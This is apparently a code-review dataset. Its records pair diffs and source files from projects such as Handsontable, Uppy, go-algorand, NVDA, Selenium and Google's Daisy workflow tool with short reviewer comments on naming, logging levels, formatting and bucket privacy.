data stored in HOT. this.syncRowWithRawSource(fromParent); if (!sameParent) { this.syncRowWithRawSource(toParent); } } /** * Translate the visual row index to the physical index, taking into consideration the state of collapsed rows. * * @private * @param {number} row Row index. * @returns {number} */ translateTrimmedRow(row) { if (this.plugin.collapsingUI) { return this.plugin.collapsingUI.translateTrimmedRow(row); } return row; } /** * Translate the physical row index to the visual index, taking into consideration the state of collapsed rows. * * @private * @param {number} row Row index. 
* @returns {number} */ untranslateTrimmedRow(row) { if (this.plugin.collapsingUI) { return this.plugin.collapsingUI.untranslateTrimmedRow(row); } return row; } } export default DataManager;
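To summarize the structure the DataManager keeps, rewriteCache()/cacheNode() walk the nested __children tree and record, for every node, its flattened row index, nesting level, and parent. The following is an illustrative sketch of that idea in Python, not Handsontable code; the function names and the use of id() as a map key are choices made only for the example.

# Illustrative only: mirrors the caching idea behind DataManager.cacheNode().
def build_cache(rows):
    cache = {"rows": [], "levels": [], "info": {}}

    def cache_node(node, level, parent):
        if len(cache["levels"]) <= level:
            cache["levels"].append([])
        cache["levels"][level].append(node)
        cache["rows"].append(node)
        cache["info"][id(node)] = {"row": len(cache["rows"]) - 1,
                                   "level": level,
                                   "parent": parent}
        for child in node.get("__children", []):
            cache_node(child, level + 1, node)

    for top_level_node in rows:
        cache_node(top_level_node, 0, None)
    return cache

data = [{"name": "a", "__children": [{"name": "a1"}, {"name": "a2"}]},
        {"name": "b"}]
cache = build_cache(data)
assert cache["info"][id(data[0]["__children"][1])]["row"] == 2  # "a2" is row 2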
1
20,014
"Flatten" is a verb, so I'd probably go with `flattenedIndex` as a variable name here.
handsontable-handsontable
js
@@ -1,5 +1,19 @@ const chalk = require('chalk') +const valuesToMask = [] +/** + * Adds a list of strings that should be masked by the logger. + * This function can only be called once through out the life of the server. + * @param {Array} maskables a list of strings to be masked + */ +exports.addMaskables = (maskables) => { + maskables.forEach((i) => { + valuesToMask.push(i) + }) + + Object.freeze(valuesToMask) +} + /** * INFO level log * @param {string} msg the message to log
1
const chalk = require('chalk') /** * INFO level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.info = (msg, tag, traceId) => { log(msg, tag, 'info', traceId) } /** * WARN level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.warn = (msg, tag, traceId) => { // @ts-ignore log(msg, tag, 'warn', traceId, chalk.bold.yellow) } /** * ERROR level log * @param {string | Error} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.error = (msg, tag, traceId) => { // @ts-ignore log(msg, tag, 'error', traceId, chalk.bold.red) } /** * DEBUG level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.debug = (msg, tag, traceId) => { if (process.env.NODE_ENV !== 'production') { log(msg, tag, 'debug', traceId) } } /** * message log * @param {string | Error} msg the message to log * @param {string} tag a unique tag to easily search for this message * @param {string} level error | info | debug * @param {function=} color function to display the log in appropriate color * @param {string=} id a unique id to easily trace logs tied to a request */ const log = (msg, tag, level, id, color) => { const time = new Date().toISOString() tag = tag || '' id = id || '' const whitespace = tag && id ? ' ' : '' color = color || ((message) => message) // exclude msg from template string so values such as error objects // can be well formatted console.log(color(`companion: ${time} [${level}] ${id}${whitespace}${tag}`), color(msg)) }
1
13,016
If it can only be called once, perhaps a more appropriate name is something like `setMaskables`? `addX` sounds like you can add many `X`es by calling it many times.
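Purely to illustrate the naming point above (this is not Uppy code), an API that accepts its values once and then freezes them reads more naturally as set_* than add_*; the Python sketch below makes the single-call contract explicit.

# Illustrative sketch of the "set once, then frozen" semantics behind the suggested name.
_values_to_mask = None

def set_maskables(maskables):
    # Store the strings to mask; callable only once for the life of the process.
    global _values_to_mask
    if _values_to_mask is not None:
        raise RuntimeError("set_maskables() may only be called once")
    _values_to_mask = tuple(maskables)  # immutable, akin to Object.freeze()

set_maskables(["secret-token", "api-key"])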
transloadit-uppy
js
@@ -38,7 +38,7 @@ func downloadAndExtractConfigPackage(channel string, targetDir string) (err erro } func downloadConfigPackage(channelName string, targetDir string) (packageFile string, err error) { - s3, err := s3.MakeS3SessionForDownload() + s3, err := s3.MakePublicS3SessionForDownload() if err != nil { return }
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package main import ( "fmt" "os" "path/filepath" "github.com/algorand/go-algorand/util/s3" "github.com/algorand/go-algorand/util/tar" ) func downloadAndExtractConfigPackage(channel string, targetDir string) (err error) { fmt.Fprintf(os.Stdout, "Downloading latest configuration file for '%s'...\n", channel) packageFile, err := downloadConfigPackage(channel, targetDir) if err != nil { return fmt.Errorf("error downloading config package for channel '%s': %v", channel, err) } // Extract package and update configFilename fmt.Fprintf(os.Stdout, "Expanding configuration package '%s' to %s\n", packageFile, targetDir) return extractConfigPackage(packageFile, targetDir) } func downloadConfigPackage(channelName string, targetDir string) (packageFile string, err error) { s3, err := s3.MakeS3SessionForDownload() if err != nil { return } prefix := fmt.Sprintf("config_%s", channelName) version, name, err := s3.GetLatestVersion(prefix) if err != nil { return } if version == 0 { err = fmt.Errorf("no config package found for channel '%s'", channelName) return } packageFile = filepath.Join(targetDir, name) file, err := os.Create(packageFile) if err != nil { return } defer file.Close() if err = s3.DownloadFile(name, file); err != nil { err = fmt.Errorf("error downloading file: %v", err) return } return } func extractConfigPackage(packageFile string, targetDir string) (err error) { err = tar.UncompressFile(packageFile, targetDir) if err != nil { return } return }
1
35,430
Nodecfg should be downloading from a private bucket -- these shouldn't be for public consumption. In general, these should be generic and expect the environment to provide the appropriate credentials and bucket.
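The point is general: the bucket name and credentials should come from the environment rather than being baked into the tool. As a generic illustration only (Python with boto3, not the go-algorand s3 package), with a hypothetical CONFIG_BUCKET environment variable:

# Illustrative only: bucket and credentials are supplied by the environment.
import os
import boto3  # resolves AWS credentials from env vars / shared config

def download_config_package(key, dest_path):
    bucket = os.environ["CONFIG_BUCKET"]  # hypothetical env var for the example
    s3 = boto3.client("s3")               # no credentials hard-coded here
    s3.download_file(bucket, key, dest_path)
    return dest_path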
algorand-go-algorand
go
@@ -0,0 +1,17 @@ +# MicrosoftEdge.py +#A part of NonVisual Desktop Access (NVDA) +#This file is covered by the GNU General Public License. +#See the file COPYING for more details. +#Copyright (C) 2018 NV Access Limited, Joseph Lee + +"""appModule for Microsoft Edge main process""" + +import appModuleHandler +import ui + +class AppModule(appModuleHandler.AppModule): + + def event_UIA_notification(self, obj, nextHandler, displayString=None, **kwargs): + # #8423: even though content process is focused, notifications are fired by main Edge process. + # The base object will simply ignore this, so notifications must be announced here and no more. + ui.message(displayString)
1
1
22,507
Could you please end the file with an empty line?
nvaccess-nvda
py
@@ -76,7 +76,7 @@ public class ProtocolHandshake { if (result.isPresent()) { Result toReturn = result.get(); - LOG.info(String.format("Detected dialect: %s", toReturn.dialect)); + LOG.finest(String.format("Detected dialect: %s", toReturn.dialect)); return toReturn; } }
1
// Licensed to the Software Freedom Conservancy (SFC) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The SFC licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package org.openqa.selenium.remote; import static com.google.common.net.HttpHeaders.CONTENT_LENGTH; import static com.google.common.net.HttpHeaders.CONTENT_TYPE; import static com.google.common.net.MediaType.JSON_UTF_8; import static java.nio.charset.StandardCharsets.UTF_8; import static org.openqa.selenium.remote.CapabilityType.PROXY; import static org.openqa.selenium.remote.http.Contents.string; import com.google.common.base.Preconditions; import com.google.common.io.CountingOutputStream; import com.google.common.io.FileBackedOutputStream; import org.openqa.selenium.Capabilities; import org.openqa.selenium.ImmutableCapabilities; import org.openqa.selenium.Proxy; import org.openqa.selenium.SessionNotCreatedException; import org.openqa.selenium.WebDriverException; import org.openqa.selenium.json.Json; import org.openqa.selenium.json.JsonException; import org.openqa.selenium.remote.http.HttpClient; import org.openqa.selenium.remote.http.HttpMethod; import org.openqa.selenium.remote.http.HttpRequest; import org.openqa.selenium.remote.http.HttpResponse; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStreamWriter; import java.io.Writer; import java.util.Map; import java.util.Objects; import java.util.Optional; import java.util.function.Function; import java.util.logging.Logger; import java.util.stream.Stream; public class ProtocolHandshake { private final static Logger LOG = Logger.getLogger(ProtocolHandshake.class.getName()); public Result createSession(HttpClient client, Command command) throws IOException { Capabilities desired = (Capabilities) command.getParameters().get("desiredCapabilities"); desired = desired == null ? new ImmutableCapabilities() : desired; int threshold = (int) Math.min(Runtime.getRuntime().freeMemory() / 10, Integer.MAX_VALUE); FileBackedOutputStream os = new FileBackedOutputStream(threshold); try ( CountingOutputStream counter = new CountingOutputStream(os); Writer writer = new OutputStreamWriter(counter, UTF_8); NewSessionPayload payload = NewSessionPayload.create(desired)) { payload.writeTo(writer); try (InputStream rawIn = os.asByteSource().openBufferedStream(); BufferedInputStream contentStream = new BufferedInputStream(rawIn)) { Optional<Result> result = createSession(client, contentStream, counter.getCount()); if (result.isPresent()) { Result toReturn = result.get(); LOG.info(String.format("Detected dialect: %s", toReturn.dialect)); return toReturn; } } } finally { os.reset(); } throw new SessionNotCreatedException( String.format( "Unable to create new remote session. 
" + "desired capabilities = %s", desired)); } private Optional<Result> createSession(HttpClient client, InputStream newSessionBlob, long size) throws IOException { // Create the http request and send it HttpRequest request = new HttpRequest(HttpMethod.POST, "/session"); HttpResponse response; long start = System.currentTimeMillis(); request.setHeader(CONTENT_LENGTH, String.valueOf(size)); request.setHeader(CONTENT_TYPE, JSON_UTF_8.toString()); request.setContent(() -> newSessionBlob); response = client.execute(request); long time = System.currentTimeMillis() - start; // Ignore the content type. It may not have been set. Strictly speaking we're not following the // W3C spec properly. Oh well. Map<?, ?> blob; try { blob = new Json().toType(string(response), Map.class); } catch (JsonException e) { throw new WebDriverException( "Unable to parse remote response: " + string(response), e); } InitialHandshakeResponse initialResponse = new InitialHandshakeResponse( time, response.getStatus(), blob); return Stream.of( new W3CHandshakeResponse().getResponseFunction(), new JsonWireProtocolResponse().getResponseFunction()) .map(func -> func.apply(initialResponse)) .filter(Objects::nonNull) .findFirst(); } public static class Result { private static Function<Object, Proxy> massageProxy = obj -> { if (obj instanceof Proxy) { return (Proxy) obj; } if (!(obj instanceof Map)) { return null; } Map<?, ?> rawMap = (Map<?, ?>) obj; for (Object key : rawMap.keySet()) { if (!(key instanceof String)) { return null; } } // This cast is now safe. //noinspection unchecked return new Proxy((Map<String, ?>) obj); }; private final Dialect dialect; private final Map<String, ?> capabilities; private final SessionId sessionId; Result(Dialect dialect, String sessionId, Map<String, ?> capabilities) { this.dialect = dialect; this.sessionId = new SessionId(Preconditions.checkNotNull(sessionId)); this.capabilities = capabilities; if (capabilities.containsKey(PROXY)) { //noinspection unchecked ((Map<String, Object>) capabilities) .put(PROXY, massageProxy.apply(capabilities.get(PROXY))); } } public Dialect getDialect() { return dialect; } public Response createResponse() { Response response = new Response(sessionId); response.setValue(capabilities); response.setStatus(ErrorCodes.SUCCESS); response.setState(ErrorCodes.SUCCESS_STRING); return response; } @Override public String toString() { return String.format("%s: %s", dialect, capabilities); } } }
1
16,445
This is an incorrect change. The dialect spoken is an important part of the handshake and should be communicated to users.
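The objection is about visibility: handlers configured at the default level drop anything below INFO, so demoting the dialect message to finest effectively hides it from users. A quick illustration of the same effect with Python's logging module (unrelated to Selenium's java.util.logging code):

# Illustrative only: messages below the configured level are never shown.
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("handshake")

log.info("Detected dialect: %s", "W3C")   # visible at the default INFO level
log.debug("Detected dialect: %s", "W3C")  # silently dropped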
SeleniumHQ-selenium
js
@@ -89,7 +89,9 @@ func (v *Var) UnmarshalJSON(b []byte) error { // Workflow is a single Daisy workflow workflow. type Workflow struct { // Populated on New() construction. - Cancel chan struct{} `json:"-"` + Cancel chan struct{} `json:"-"` + isCanceled bool + isCanceledMx sync.Mutex // Workflow template fields. // Workflow name.
1
// Copyright 2017 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package daisy describes a daisy workflow. package daisy import ( "bytes" "context" "encoding/json" "fmt" "io/ioutil" "os" "path" "path/filepath" "reflect" "strconv" "strings" "sync" "time" "cloud.google.com/go/logging" "cloud.google.com/go/storage" "github.com/GoogleCloudPlatform/compute-image-tools/daisy/compute" "google.golang.org/api/iterator" "google.golang.org/api/option" ) const defaultTimeout = "10m" func daisyBkt(ctx context.Context, client *storage.Client, project string) (string, DError) { dBkt := strings.Replace(project, ":", "-", -1) + "-daisy-bkt" it := client.Buckets(ctx, project) for bucketAttrs, err := it.Next(); err != iterator.Done; bucketAttrs, err = it.Next() { if err != nil { return "", typedErr(apiError, "failed to iterate buckets", err) } if bucketAttrs.Name == dBkt { return dBkt, nil } } if err := client.Bucket(dBkt).Create(ctx, project, nil); err != nil { return "", typedErr(apiError, "failed to create bucket", err) } return dBkt, nil } // TimeRecord is a type with info of a step execution time type TimeRecord struct { Name string StartTime time.Time EndTime time.Time } // Var is a type with a flexible JSON representation. A Var can be represented // by either a string, or by this struct definition. A Var that is represented // by a string will unmarshal into the struct: {Value: <string>, Required: false, Description: ""}. type Var struct { Value string Required bool `json:",omitempty"` Description string `json:",omitempty"` } // UnmarshalJSON unmarshals a Var. func (v *Var) UnmarshalJSON(b []byte) error { var s string if err := json.Unmarshal(b, &s); err == nil { v.Value = s return nil } // We can't unmarshal into Var directly as it would create an infinite loop. type aVar Var return json.Unmarshal(b, &struct{ *aVar }{aVar: (*aVar)(v)}) } // Workflow is a single Daisy workflow workflow. type Workflow struct { // Populated on New() construction. Cancel chan struct{} `json:"-"` // Workflow template fields. // Workflow name. Name string `json:",omitempty"` // Project to run in. Project string `json:",omitempty"` // Zone to run in. Zone string `json:",omitempty"` // GCS Path to use for scratch data and write logs/results to. GCSPath string `json:",omitempty"` // Path to OAuth credentials file. OAuthPath string `json:",omitempty"` // Sources used by this workflow, map of destination to source. Sources map[string]string `json:",omitempty"` // Vars defines workflow variables, substitution is done at Workflow run time. Vars map[string]Var `json:",omitempty"` Steps map[string]*Step `json:",omitempty"` // Map of steps to their dependencies. Dependencies map[string][]string `json:",omitempty"` // Default timout for each step, defaults to 10m. // Must be parsable by https://golang.org/pkg/time/#ParseDuration. DefaultTimeout string `json:",omitempty"` defaultTimeout time.Duration // Working fields. 
autovars map[string]string workflowDir string parent *Workflow bucket string scratchPath string sourcesPath string logsPath string outsPath string username string externalLogging bool gcsLoggingDisabled bool cloudLoggingDisabled bool stdoutLoggingDisabled bool id string Logger Logger `json:"-"` cleanupHooks []func() DError cleanupHooksMx sync.Mutex recordTimeMx sync.Mutex stepWait sync.WaitGroup logProcessHook func(string) string // Optional compute endpoint override.stepWait ComputeEndpoint string `json:",omitempty"` ComputeClient compute.Client `json:"-"` StorageClient *storage.Client `json:"-"` cloudLoggingClient *logging.Client // Resource registries. disks *diskRegistry forwardingRules *forwardingRuleRegistry firewallRules *firewallRuleRegistry images *imageRegistry machineImages *machineImageRegistry instances *instanceRegistry networks *networkRegistry subnetworks *subnetworkRegistry targetInstances *targetInstanceRegistry objects *objectRegistry snapshots *snapshotRegistry // Cache of resources machineTypeCache twoDResourceCache instanceCache twoDResourceCache diskCache twoDResourceCache subnetworkCache twoDResourceCache targetInstanceCache twoDResourceCache forwardingRuleCache twoDResourceCache imageCache oneDResourceCache imageFamilyCache oneDResourceCache machineImageCache oneDResourceCache networkCache oneDResourceCache firewallRuleCache oneDResourceCache zonesCache oneDResourceCache regionsCache oneDResourceCache licenseCache oneDResourceCache snapshotCache oneDResourceCache stepTimeRecords []TimeRecord serialControlOutputValues map[string]string serialControlOutputValuesMx sync.Mutex //Forces cleanup on error of all resources, including those marked with NoCleanup ForceCleanupOnError bool // forceCleanup is set to true when resources should be forced clean, even when NoCleanup is set to true forceCleanup bool // cancelReason provides custom reason when workflow is canceled. f cancelReason string } //DisableCloudLogging disables logging to Cloud Logging for this workflow. func (w *Workflow) DisableCloudLogging() { w.cloudLoggingDisabled = true } //DisableGCSLogging disables logging to GCS for this workflow. func (w *Workflow) DisableGCSLogging() { w.gcsLoggingDisabled = true } //DisableStdoutLogging disables logging to stdout for this workflow. func (w *Workflow) DisableStdoutLogging() { w.stdoutLoggingDisabled = true } // AddVar adds a variable set to the Workflow. func (w *Workflow) AddVar(k, v string) { if w.Vars == nil { w.Vars = map[string]Var{} } w.Vars[k] = Var{Value: v} } // AddSerialConsoleOutputValue adds an serial-output key-value pair to the Workflow. func (w *Workflow) AddSerialConsoleOutputValue(k, v string) { w.serialControlOutputValuesMx.Lock() if w.serialControlOutputValues == nil { w.serialControlOutputValues = map[string]string{} } w.serialControlOutputValues[k] = v w.serialControlOutputValuesMx.Unlock() } // GetSerialConsoleOutputValue gets an serial-output value by key. func (w *Workflow) GetSerialConsoleOutputValue(k string) string { return w.serialControlOutputValues[k] } func (w *Workflow) addCleanupHook(hook func() DError) { w.cleanupHooksMx.Lock() w.cleanupHooks = append(w.cleanupHooks, hook) w.cleanupHooksMx.Unlock() } // SetLogProcessHook sets a hook function to process log string func (w *Workflow) SetLogProcessHook(hook func(string) string) { w.logProcessHook = hook } // Validate runs validation on the workflow. 
func (w *Workflow) Validate(ctx context.Context) DError { if err := w.PopulateClients(ctx); err != nil { close(w.Cancel) return Errf("error populating workflow: %v", err) } if err := w.validateRequiredFields(); err != nil { close(w.Cancel) return Errf("error validating workflow: %v", err) } if err := w.populate(ctx); err != nil { close(w.Cancel) return Errf("error populating workflow: %v", err) } w.LogWorkflowInfo("Validating workflow") if err := w.validate(ctx); err != nil { w.LogWorkflowInfo("Error validating workflow: %v", err) close(w.Cancel) return err } w.LogWorkflowInfo("Validation Complete") return nil } // WorkflowModifier is a function type for functions that can modify a Workflow object. type WorkflowModifier func(*Workflow) // Run runs a workflow. func (w *Workflow) Run(ctx context.Context) error { return w.RunWithModifiers(ctx, nil, nil) } // RunWithModifiers runs a workflow with the ability to modify it before and/or after validation. func (w *Workflow) RunWithModifiers( ctx context.Context, preValidateWorkflowModifier WorkflowModifier, postValidateWorkflowModifier WorkflowModifier) (err DError) { w.externalLogging = true if preValidateWorkflowModifier != nil { preValidateWorkflowModifier(w) } if err = w.Validate(ctx); err != nil { return err } if postValidateWorkflowModifier != nil { postValidateWorkflowModifier(w) } defer w.cleanup() defer func() { if err != nil { w.forceCleanup = w.ForceCleanupOnError } }() w.LogWorkflowInfo("Workflow Project: %s", w.Project) w.LogWorkflowInfo("Workflow Zone: %s", w.Zone) w.LogWorkflowInfo("Workflow GCSPath: %s", w.GCSPath) w.LogWorkflowInfo("Daisy scratch path: https://console.cloud.google.com/storage/browser/%s", path.Join(w.bucket, w.scratchPath)) w.LogWorkflowInfo("Uploading sources") if err = w.uploadSources(ctx); err != nil { w.LogWorkflowInfo("Error uploading sources: %v", err) close(w.Cancel) return err } w.LogWorkflowInfo("Running workflow") defer func() { for k, v := range w.serialControlOutputValues { w.LogWorkflowInfo("Serial-output value -> %v:%v", k, v) } }() if err = w.run(ctx); err != nil { w.LogWorkflowInfo("Error running workflow: %v", err) return err } return nil } func (w *Workflow) recordStepTime(stepName string, startTime time.Time, endTime time.Time) { if w.parent == nil { w.recordTimeMx.Lock() w.stepTimeRecords = append(w.stepTimeRecords, TimeRecord{stepName, startTime, endTime}) w.recordTimeMx.Unlock() } else { w.parent.recordStepTime(fmt.Sprintf("%s.%s", w.Name, stepName), startTime, endTime) } } // GetStepTimeRecords returns time records of each steps func (w *Workflow) GetStepTimeRecords() []TimeRecord { return w.stepTimeRecords } func (w *Workflow) cleanup() { startTime := time.Now() w.LogWorkflowInfo("Workflow %q cleaning up (this may take up to 2 minutes).", w.Name) select { case <-w.Cancel: default: close(w.Cancel) } // Allow goroutines that are watching w.Cancel an opportunity // to detect that the workflow was cancelled and to cleanup. 
c := make(chan struct{}) go func() { w.stepWait.Wait() close(c) }() select { case <-c: case <-time.After(4 * time.Second): } for _, hook := range w.cleanupHooks { if err := hook(); err != nil { w.LogWorkflowInfo("Error returned from cleanup hook: %s", err) } } w.LogWorkflowInfo("Workflow %q finished cleanup.", w.Name) w.recordStepTime("workflow cleanup", startTime, time.Now()) } func (w *Workflow) genName(n string) string { name := w.Name for parent := w.parent; parent != nil; parent = parent.parent { name = parent.Name + "-" + name } prefix := name if n != "" { prefix = fmt.Sprintf("%s-%s", n, name) } if len(prefix) > 57 { prefix = prefix[0:56] } result := fmt.Sprintf("%s-%s", prefix, w.id) if len(result) > 64 { result = result[0:63] } return strings.ToLower(result) } func (w *Workflow) getSourceGCSAPIPath(s string) string { return fmt.Sprintf("%s/%s", gcsAPIBase, path.Join(w.bucket, w.sourcesPath, s)) } // PopulateClients populates the compute and storage clients for the workflow. func (w *Workflow) PopulateClients(ctx context.Context) error { // API clients instantiation. var err error computeOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.ComputeEndpoint != "" { computeOptions = append(computeOptions, option.WithEndpoint(w.ComputeEndpoint)) } if w.ComputeClient == nil { w.ComputeClient, err = compute.NewClient(ctx, computeOptions...) if err != nil { return typedErr(apiError, "failed to create compute client", err) } } storageOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.StorageClient == nil { w.StorageClient, err = storage.NewClient(ctx, storageOptions...) if err != nil { return err } } loggingOptions := []option.ClientOption{option.WithCredentialsFile(w.OAuthPath)} if w.externalLogging && w.cloudLoggingClient == nil { w.cloudLoggingClient, err = logging.NewClient(ctx, w.Project, loggingOptions...) if err != nil { return err } } return nil } func (w *Workflow) populateStep(ctx context.Context, s *Step) DError { if s.Timeout == "" { s.Timeout = w.DefaultTimeout } timeout, err := time.ParseDuration(s.Timeout) if err != nil { return newErr(fmt.Sprintf("failed to parse duration for workflow %v, step %v", w.Name, s.name), err) } s.timeout = timeout var derr DError var step stepImpl if step, derr = s.stepImpl(); derr != nil { return derr } return step.populate(ctx, s) } // populate does the following: // - checks that all required Vars are set. // - instantiates API clients, if needed. // - sets generic autovars and do first round of var substitution. // - sets GCS path information. // - generates autovars from workflow fields (Name, Zone, etc) and run second round of var substitution. // - sets up logger. // - runs populate on each step. func (w *Workflow) populate(ctx context.Context) DError { for k, v := range w.Vars { if v.Required && v.Value == "" { return Errf("cannot populate workflow, required var %q is unset", k) } } // Set some generic autovars and run first round of var substitution. 
cwd, _ := os.Getwd() now := time.Now().UTC() w.username = getUser() w.autovars = map[string]string{ "ID": w.id, "DATE": now.Format("20060102"), "DATETIME": now.Format("20060102150405"), "TIMESTAMP": strconv.FormatInt(now.Unix(), 10), "USERNAME": w.username, "WFDIR": w.workflowDir, "CWD": cwd, } var replacements []string for k, v := range w.autovars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v) } for k, v := range w.Vars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v.Value) } substitute(reflect.ValueOf(w).Elem(), strings.NewReplacer(replacements...)) // Parse timeout. timeout, err := time.ParseDuration(w.DefaultTimeout) if err != nil { return Errf("failed to parse timeout for workflow: %v", err) } w.defaultTimeout = timeout // Set up GCS paths. if w.GCSPath == "" { dBkt, err := daisyBkt(ctx, w.StorageClient, w.Project) if err != nil { return err } w.GCSPath = "gs://" + dBkt } bkt, p, derr := splitGCSPath(w.GCSPath) if derr != nil { return derr } w.bucket = bkt w.scratchPath = path.Join(p, fmt.Sprintf("daisy-%s-%s-%s", w.Name, now.Format("20060102-15:04:05"), w.id)) w.sourcesPath = path.Join(w.scratchPath, "sources") w.logsPath = path.Join(w.scratchPath, "logs") w.outsPath = path.Join(w.scratchPath, "outs") // Generate more autovars from workflow fields. Run second round of var substitution. w.autovars["NAME"] = w.Name w.autovars["FULLNAME"] = w.genName("") w.autovars["ZONE"] = w.Zone w.autovars["PROJECT"] = w.Project w.autovars["GCSPATH"] = w.GCSPath w.autovars["SCRATCHPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.scratchPath) w.autovars["SOURCESPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.sourcesPath) w.autovars["LOGSPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.logsPath) w.autovars["OUTSPATH"] = fmt.Sprintf("gs://%s/%s", w.bucket, w.outsPath) replacements = []string{} for k, v := range w.autovars { replacements = append(replacements, fmt.Sprintf("${%s}", k), v) } substitute(reflect.ValueOf(w).Elem(), strings.NewReplacer(replacements...)) // We do this here, and not in validate, as embedded startup scripts could // have what we think are daisy variables. if err := w.validateVarsSubbed(); err != nil { return err } if err := w.substituteSourceVars(ctx, reflect.ValueOf(w).Elem()); err != nil { return err } if w.Logger == nil { w.createLogger(ctx) } // Run populate on each step. for name, s := range w.Steps { s.name = name s.w = w if err := w.populateStep(ctx, s); err != nil { return Errf("error populating step %q: %v", name, err) } } return nil } // AddDependency creates a dependency of dependent on each dependency. Returns an // error if dependent or dependency are not steps in this workflow. func (w *Workflow) AddDependency(dependent *Step, dependencies ...*Step) error { if _, ok := w.Steps[dependent.name]; !ok { return fmt.Errorf("can't create dependency: step %q does not exist", dependent.name) } if w.Dependencies == nil { w.Dependencies = map[string][]string{} } for _, dependency := range dependencies { if _, ok := w.Steps[dependency.name]; !ok { return fmt.Errorf("can't create dependency: step %q does not exist", dependency.name) } if !strIn(dependency.name, w.Dependencies[dependent.name]) { // Don't add if dependency already exists. 
w.Dependencies[dependent.name] = append(w.Dependencies[dependent.name], dependency.name) } } return nil } func (w *Workflow) includeWorkflow(iw *Workflow) { iw.Cancel = w.Cancel iw.parent = w iw.disks = w.disks iw.forwardingRules = w.forwardingRules iw.firewallRules = w.firewallRules iw.images = w.images iw.machineImages = w.machineImages iw.instances = w.instances iw.networks = w.networks iw.subnetworks = w.subnetworks iw.targetInstances = w.targetInstances iw.snapshots = w.snapshots iw.objects = w.objects } // ID is the unique identifyier for this Workflow. func (w *Workflow) ID() string { return w.id } // NewIncludedWorkflowFromFile reads and unmarshals a workflow with the same resources as the parent. func (w *Workflow) NewIncludedWorkflowFromFile(file string) (*Workflow, error) { iw := New() w.includeWorkflow(iw) if !filepath.IsAbs(file) { file = filepath.Join(w.workflowDir, file) } if err := readWorkflow(file, iw); err != nil { return nil, err } return iw, nil } // NewStep instantiates a new, typeless step for this workflow. // The step type must be specified before running this workflow. func (w *Workflow) NewStep(name string) (*Step, error) { if _, ok := w.Steps[name]; ok { return nil, fmt.Errorf("can't create step %q: a step already exists with that name", name) } s := &Step{name: name, w: w} if w.Steps == nil { w.Steps = map[string]*Step{} } w.Steps[name] = s return s, nil } // NewSubWorkflow instantiates a new workflow as a child to this workflow. func (w *Workflow) NewSubWorkflow() *Workflow { sw := New() sw.Cancel = w.Cancel sw.parent = w return sw } // NewSubWorkflowFromFile reads and unmarshals a workflow as a child to this workflow. func (w *Workflow) NewSubWorkflowFromFile(file string) (*Workflow, error) { sw := w.NewSubWorkflow() if !filepath.IsAbs(file) { file = filepath.Join(w.workflowDir, file) } if err := readWorkflow(file, sw); err != nil { return nil, err } return sw, nil } // Print populates then pretty prints the workflow. func (w *Workflow) Print(ctx context.Context) { w.externalLogging = false if err := w.PopulateClients(ctx); err != nil { fmt.Println("Error running PopulateClients:", err) } if err := w.populate(ctx); err != nil { fmt.Println("Error running populate:", err) } b, err := json.MarshalIndent(w, "", " ") if err != nil { fmt.Println("Error marshalling workflow for printing:", err) } fmt.Println(string(b)) } func (w *Workflow) run(ctx context.Context) DError { return w.traverseDAG(func(s *Step) DError { return w.runStep(ctx, s) }) } func (w *Workflow) runStep(ctx context.Context, s *Step) DError { timeout := make(chan struct{}) go func() { time.Sleep(s.timeout) close(timeout) }() e := make(chan DError) go func() { e <- s.run(ctx) }() select { case err := <-e: return err case <-timeout: return s.getTimeoutError() } } // Concurrently traverse the DAG, running func f on each step. // Return an error if f returns an error on any step. func (w *Workflow) traverseDAG(f func(*Step) DError) DError { // waiting = steps and the dependencies they are waiting for. // running = the currently running steps. // start = map of steps' start channels/semaphores. // done = map of steps' done channels for signaling step completion. waiting := map[string][]string{} var running []string start := map[string]chan DError{} done := map[string]chan DError{} // Setup: channels, copy dependencies. for name := range w.Steps { waiting[name] = w.Dependencies[name] start[name] = make(chan DError) done[name] = make(chan DError) } // Setup: goroutine for each step. 
